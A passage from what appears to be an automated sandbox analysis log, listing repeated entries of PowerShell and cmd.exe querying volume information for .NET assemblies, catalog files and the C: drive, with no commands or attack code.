                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
